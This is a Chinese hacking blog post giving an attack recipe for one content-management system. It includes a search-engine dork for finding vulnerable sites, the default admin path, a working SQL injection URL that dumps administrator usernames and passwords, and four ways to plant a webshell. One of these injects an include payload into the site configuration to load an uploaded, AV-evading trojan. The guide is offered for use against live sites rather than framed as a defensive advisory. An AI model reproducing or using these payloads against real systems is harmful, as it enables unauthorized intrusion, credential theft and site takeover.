南方数据网站漏洞

作者:qxz_xp   发布:2013-07-28 10:46   分类:菜鸟入门, 黑客攻防   1条评论  

漏洞影响版本 v10.0 v11.0

关键字:inurl:”HomeMarket.asp”

默认后台:/admin

直接爆用户密码:
http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’

拿shell方法貌似有4种:

1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。

2、进后台备份数据库

3、在网站配置的版权信息里插入一句话,一句话地址写入到http://www.xxx.com/inc/config.asp3.1、另外一种插配置:第一步  网站配置添加TXT保存成功后第2步传一个TXT小马小马要免杀的。第3步  网站配置 利用包含得到小马”%><!–#include file=”201331420455473.txt “–><%’填入网站配置。

4、编辑器:/admin/southidceditor/admin_style.asp

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/4303.html

QQ空间 微信 腾讯微博 新浪微博 我的搜狐 人人网 天涯社区 百度贴吧 更多
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. 带你了解后渗透工具Koadic(5)
  2. 微信曝远程任意代码执行漏洞,可被远程控制(1)
  3. Burpsuite1.7.03 渗透神器最新破解版(5)
  4. 北极熊扫描器3.5增加超级搜索,云平台支持在线安装(7)
  5. AirDrop漏洞 百万苹果设备可被默默安装恶意应用(2)
  6. 利用搜索引擎来进行漏洞批量抓取 php小脚本(1)
  7. 渗透神器Burpsuite Pro v1.6.24 破解版下载(1)
  8. 技术揭秘“QQ空间”自动转发不良信息(2)
  9. 窃听电话的Hacking Team RCSAndroid木马(1)
  10. 安全扫描神器Acunetix Web Vulnerability Sca
  11. 走近科学:周末一起去黑市逛逛
  12. WordPress默认主题存在DOM XSS漏洞 影响百(1)
  13. 防社会工程学攻击的简单技术与姿势(2)
  14. iOS 8漏洞导致wifi覆盖范围内任意iPhone iPad
  15. 七个黑你的理由
  16. Windows曝新漏洞 影响Win10在内的所有版本

南方数据网站漏洞:目前有1 条留言

  1. 0楼
    李雪儿:

    强文终于出现,要顶的啊,谢谢博主

    2015-12-31 01:16 [回复]

发表评论

0 + 9 =

快捷键:Ctrl+Enter